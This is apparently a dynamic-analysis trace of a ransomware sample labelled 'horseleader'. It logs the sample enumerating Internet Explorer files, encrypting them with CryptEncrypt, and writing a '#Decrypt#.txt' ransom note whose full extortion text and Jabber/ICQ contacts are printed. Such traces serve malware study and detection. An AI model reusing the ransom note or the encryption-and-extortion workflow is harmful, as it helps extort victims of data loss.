lpString2="#Decrypt#.txt") returned 1 [0252.020] lstrcmpW (lpString1="iedvtool.dll.mui", lpString2="_uninstalling_.png") returned 1 
[0252.020] lstrlenW (lpString=".testttjffg") returned 11 [0252.020] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iedvtool.dll.mui", lpSrch=".testttjffg") returned 0x0 [0252.020] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0252.020] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0252.021] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iedvtool.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iedvtool.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.021] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ieinstal.exe.mui", cAlternateFileName="")) returned 1 [0252.021] lstrcmpiW (lpString1="ieinstal.exe.mui", lpString2="Windows") returned -1 [0252.021] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui") returned 61 [0252.021] StrStrIW (lpFirst="ieinstal.exe.mui", lpSrch=".horseleader") returned 0x0 [0252.021] lstrcmpW (lpString1="ieinstal.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0252.021] lstrcmpW (lpString1="ieinstal.exe.mui", lpString2="_uninstalling_.png") returned 1 [0252.021] lstrlenW (lpString=".testttjffg") returned 11 [0252.021] StrStrW 
(lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui", lpSrch=".testttjffg") returned 0x0 [0252.021] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0252.021] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0252.021] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\ieinstal.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.022] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ielowutil.exe.mui", cAlternateFileName="")) returned 1 [0252.022] lstrcmpiW (lpString1="ielowutil.exe.mui", lpString2="Windows") returned -1 [0252.022] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ielowutil.exe.mui") returned 62 [0252.022] StrStrIW (lpFirst="ielowutil.exe.mui", lpSrch=".horseleader") returned 0x0 [0252.022] lstrcmpW (lpString1="ielowutil.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0252.022] lstrcmpW (lpString1="ielowutil.exe.mui", lpString2="_uninstalling_.png") returned 1 [0252.022] lstrlenW (lpString=".testttjffg") returned 11 [0252.022] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet 
Explorer\\en-US\\ielowutil.exe.mui", lpSrch=".testttjffg") returned 0x0 [0252.022] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0252.022] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0252.022] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\ielowutil.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\ielowutil.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.022] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe647cb96, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe647cb96, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0xe45e4000, ftLastWriteTime.dwHighDateTime=0x1ca042a, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="iexplore.exe.mui", cAlternateFileName="")) returned 1 [0252.022] lstrcmpiW (lpString1="iexplore.exe.mui", lpString2="Windows") returned -1 [0252.022] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui") returned 61 [0252.022] StrStrIW (lpFirst="iexplore.exe.mui", lpSrch=".horseleader") returned 0x0 [0252.022] lstrcmpW (lpString1="iexplore.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0252.022] lstrcmpW (lpString1="iexplore.exe.mui", lpString2="_uninstalling_.png") returned 1 [0252.022] lstrlenW (lpString=".testttjffg") returned 11 [0252.022] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui", lpSrch=".testttjffg") returned 0x0 
[0252.022] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0252.022] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0252.023] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.023] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="jsdbgui.dll.mui", cAlternateFileName="")) returned 1 [0252.023] lstrcmpiW (lpString1="jsdbgui.dll.mui", lpString2="Windows") returned -1 [0252.023] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdbgui.dll.mui") returned 60 [0252.023] StrStrIW (lpFirst="jsdbgui.dll.mui", lpSrch=".horseleader") returned 0x0 [0252.023] lstrcmpW (lpString1="jsdbgui.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0252.023] lstrcmpW (lpString1="jsdbgui.dll.mui", lpString2="_uninstalling_.png") returned 1 [0252.023] lstrlenW (lpString=".testttjffg") returned 11 [0252.023] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdbgui.dll.mui", lpSrch=".testttjffg") returned 0x0 [0252.023] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | 
out: pbBuffer=0x32aef88) returned 1 [0252.023] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0252.023] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdbgui.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\jsdbgui.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.023] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="jsdebuggeride.dll.mui", cAlternateFileName="")) returned 1 [0252.023] lstrcmpiW (lpString1="jsdebuggeride.dll.mui", lpString2="Windows") returned -1 [0252.023] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui") returned 66 [0252.023] StrStrIW (lpFirst="jsdebuggeride.dll.mui", lpSrch=".horseleader") returned 0x0 [0252.023] lstrcmpW (lpString1="jsdebuggeride.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0252.023] lstrcmpW (lpString1="jsdebuggeride.dll.mui", lpString2="_uninstalling_.png") returned 1 [0252.023] lstrlenW (lpString=".testttjffg") returned 11 [0252.023] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui", lpSrch=".testttjffg") returned 0x0 [0252.024] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 
[0252.024] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0252.024] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\jsdebuggeride.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.024] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="JSProfilerCore.dll.mui", cAlternateFileName="")) returned 1 [0252.024] lstrcmpiW (lpString1="JSProfilerCore.dll.mui", lpString2="Windows") returned -1 [0252.024] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui") returned 67 [0252.024] StrStrIW (lpFirst="JSProfilerCore.dll.mui", lpSrch=".horseleader") returned 0x0 [0252.024] lstrcmpW (lpString1="JSProfilerCore.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0252.024] lstrcmpW (lpString1="JSProfilerCore.dll.mui", lpString2="_uninstalling_.png") returned 1 [0252.024] lstrlenW (lpString=".testttjffg") returned 11 [0252.024] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui", lpSrch=".testttjffg") returned 0x0 [0252.024] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0252.024] CryptEncrypt 
(in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0252.024] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\jsprofilercore.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.024] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="jsprofilerui.dll.mui", cAlternateFileName="")) returned 1 [0252.024] lstrcmpiW (lpString1="jsprofilerui.dll.mui", lpString2="Windows") returned -1 [0252.024] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui") returned 65 [0252.024] StrStrIW (lpFirst="jsprofilerui.dll.mui", lpSrch=".horseleader") returned 0x0 [0252.025] lstrcmpW (lpString1="jsprofilerui.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0252.025] lstrcmpW (lpString1="jsprofilerui.dll.mui", lpString2="_uninstalling_.png") returned 1 [0252.025] lstrlenW (lpString=".testttjffg") returned 11 [0252.025] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui", lpSrch=".testttjffg") returned 0x0 [0252.025] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0252.025] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, 
Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0252.025] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\jsprofilerui.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.027] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="jsprofilerui.dll.mui", cAlternateFileName="")) returned 0 [0252.027] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0252.028] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\#Decrypt#.txt") returned 58 [0252.028] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\internet explorer\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0252.030] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0252.030] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0252.031] lstrlenA (lpString="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") returned 1368 [0252.031] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0252.031] CloseHandle (hObject=0x1cc) returned 1 [0252.031] GetProcessHeap () returned 0x780000 [0252.031] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0252.031] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f55643f, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x5f55643f, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x23ff2d20, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xce00, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="hmmapi.dll", cAlternateFileName="")) returned 1 [0252.032] lstrcmpiW (lpString1="hmmapi.dll", lpString2="Windows") returned -1 [0252.032] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll") returned 49 [0252.032] StrStrIW (lpFirst="hmmapi.dll", lpSrch=".horseleader") returned 0x0 [0252.032] lstrcmpW (lpString1="hmmapi.dll", lpString2="#Decrypt#.txt") returned 1 [0252.032] lstrcmpW (lpString1="hmmapi.dll", lpString2="_uninstalling_.png") returned 1 [0252.032] lstrlenW (lpString=".testttjffg") returned 11 [0252.032] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll", 
lpSrch=".testttjffg") returned 0x0 [0252.032] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.032] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.032] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll" (normalized: "c:\\program files\\internet explorer\\hmmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.035] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9a30bbb, ftCreationTime.dwHighDateTime=0x1c9ea0a, ftLastAccessTime.dwLowDateTime=0xb9a30bbb, ftLastAccessTime.dwHighDateTime=0x1c9ea0a, ftLastWriteTime.dwLowDateTime=0xb9a30bbb, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xa59, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="ie8props.propdesc", cAlternateFileName="")) returned 1 [0252.035] lstrcmpiW (lpString1="ie8props.propdesc", lpString2="Windows") returned -1 [0252.035] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\ie8props.propdesc") returned 56 [0252.035] StrStrIW (lpFirst="ie8props.propdesc", lpSrch=".horseleader") returned 0x0 [0252.035] lstrcmpW (lpString1="ie8props.propdesc", lpString2="#Decrypt#.txt") returned 1 [0252.035] lstrcmpW (lpString1="ie8props.propdesc", lpString2="_uninstalling_.png") returned 1 [0252.036] lstrlenW (lpString=".testttjffg") returned 11 [0252.036] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\ie8props.propdesc", lpSrch=".testttjffg") returned 0x0 [0252.036] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, 
pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.036] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.036] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ie8props.propdesc" (normalized: "c:\\program files\\internet explorer\\ie8props.propdesc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.036] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa37b6f98, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa37b6f98, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa37b6f98, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="iecompat.dll", cAlternateFileName="")) returned 1 [0252.036] lstrcmpiW (lpString1="iecompat.dll", lpString2="Windows") returned -1 [0252.036] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\iecompat.dll") returned 51 [0252.036] StrStrIW (lpFirst="iecompat.dll", lpSrch=".horseleader") returned 0x0 [0252.036] lstrcmpW (lpString1="iecompat.dll", lpString2="#Decrypt#.txt") returned 1 [0252.036] lstrcmpW (lpString1="iecompat.dll", lpString2="_uninstalling_.png") returned 1 [0252.036] lstrlenW (lpString=".testttjffg") returned 11 [0252.036] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\iecompat.dll", lpSrch=".testttjffg") returned 0x0 [0252.036] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.036] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.036] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iecompat.dll" (normalized: "c:\\program files\\internet explorer\\iecompat.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.036] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa37b6f98, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa37b6f98, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa37dd0f9, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xf7600, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="iedvtool.dll", cAlternateFileName="")) returned 1 [0252.036] lstrcmpiW (lpString1="iedvtool.dll", lpString2="Windows") returned -1 [0252.037] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\iedvtool.dll") returned 51 [0252.037] StrStrIW (lpFirst="iedvtool.dll", lpSrch=".horseleader") returned 0x0 [0252.037] lstrcmpW (lpString1="iedvtool.dll", lpString2="#Decrypt#.txt") returned 1 [0252.037] lstrcmpW (lpString1="iedvtool.dll", lpString2="_uninstalling_.png") returned 1 [0252.037] lstrlenW (lpString=".testttjffg") returned 11 [0252.037] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\iedvtool.dll", lpSrch=".testttjffg") returned 0x0 [0252.037] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.037] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 
